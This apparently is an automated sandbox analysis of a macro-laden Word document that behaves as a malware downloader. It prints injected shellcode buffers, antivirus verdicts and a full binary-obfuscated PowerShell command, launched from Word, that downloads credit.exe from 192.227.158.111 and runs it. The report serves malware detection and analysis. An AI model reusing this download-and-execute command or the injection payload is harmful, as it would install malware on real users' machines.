 buffer: U‹ìƒÄìVW‹E‹ð}쥥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^‹å]‹ÀU‹ìƒÄàSVW‹ù‰Uü‹Ø‹u3À‰EøhÄIhØIèEÿÿPèGÿÿ‰EèhèIhØIè-ÿÿPè/ÿÿ‰EähøIhØIèÿÿPèÿÿ‰Eàƒþu‰}ðë‹Î‹×‹ÃèGüÿÿ‰Eð‹Uü‹Ãè¢ûÿÿ‰EìjjMàºÐH‹Ãè`üÿÿ‹Ø…ÛtjÿSè¦ÿÿEôPSè„ÿÿ‹Eô‰Eø‹Eø_^[‹å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadU‹ìƒÄìS‰Eü‹Eü‰Eø‹E‹@ü‹€¤‰EôëU‹Eø‹@ƒèÑè‰Eì‹EøƒÀ‰Eð‹UìJ…Òr0B‹Eðf‹öÅðt‹E‹@ô‹]øfáÿ·ÉÁ‹M‹IøƒEðJuыEð‰Eø‹Eø+Eü;Eôr [‹å]Ã
base_address: 0x00160000
process_identifier: 2808
process_handle: 0x00000198
1 1 0

WriteProcessMemory

 buffer: YY
base_address: 0x001f0000
process_identifier: 2808
process_handle: 0x00000198
1 1 0

WriteProcessMemory

 buffer: U‹ìƒÄø‹E‹‰Uø‹P‰Uü1ÀPjÿuøÿUüYY]@U‹ìƒÄÔSVW‹ú‹ðEԋô?è5ÿÿ3ÀUh½Hdÿ0d‰ ÆEÿ‹G<ljEô»Ãj@h0‹Eô‹@PP‹Eô‹@4ÃPèÿÿ‰Eðƒ}ðt0h€j‹EðPèÿÿj@h0‹Eô‹@PP‹Eô‹@4ÃPVèâÿÿ‰Eðƒ}ðuû0v—EÔP‹Ï‹Uð‹Æ蝋EԅÀt7‰Eè‹Uà‰UìUøR‹UØRP‹EðPVèÖÿÿjjM躈G‹Æè_ýÿÿ…ÀtÆEÿ3ÀZYYd‰hÄHEԋô?èÿÿÃ
base_address: 0x00200000
process_identifier: 2808
process_handle: 0x00000198
1 1 0
process credit.exe useragent zipo
process credit.exe useragent aswe
Time & API Arguments Status Return Repeated

send

 buffer: GET /credit.exe HTTP/1.1 Host: 192.227.158.111 Connection: Keep-Alive
socket: 1276
sent: 75
1 75 0
parent_process winword.exe martian_process Powershell $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110010,00110111,00101110,00110001,00110101,00111000,00101110,00110001,00110001,00110001,00101111,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
parent_process winword.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110010,00110111,00101110,00110001,00110101,00111000,00101110,00110001,00110001,00110001,00101111,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\credit.exe
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\credit.exe"
Process injection Process 1620 resumed a thread in remote process 2200
Process injection Process 2876 resumed a thread in remote process 2940
Process injection Process 180 resumed a thread in remote process 1568
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000005d4
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2940
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 1568
1 0 0
Elastic malicious (high confidence)
Arcabit VB:Trojan.Valyria.D13D1
Cyren PP97M/Agent.AAK.gen!Eldorado
Avast SNH:Script [Dropper]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.MSOffice.SAgent.gen
BitDefender VB:Trojan.Valyria.5073
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
MicroWorld-eScan VB:Trojan.Valyria.5073
Tencent Heur.Macro.Generic.f.31879a65
Ad-Aware VB:Trojan.Valyria.5073
McAfee-GW-Edition BehavesLike.Downloader.cc
FireEye VB:Trojan.Valyria.5073
Emsisoft VB:Trojan.Valyria.5073 (B)
GData VB:Trojan.Valyria.5073
Avira HEUR/Macro.Downloader.MRXW.Gen
Microsoft TrojanDownloader:O97M/Obfuse.SS!MTB
MAX malware (ai score=84)
Zoner Probably Heur.W97Obfuscated
SentinelOne Static AI - Malicious OPENXML
Fortinet VBA/Agent.891E!tr
AVG SNH:Script [Dropper]
Qihoo-360 ex_virus.macro.ShellExecute.a
dead_host 185.189.112.27:8618
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Local\Temp\credit.exe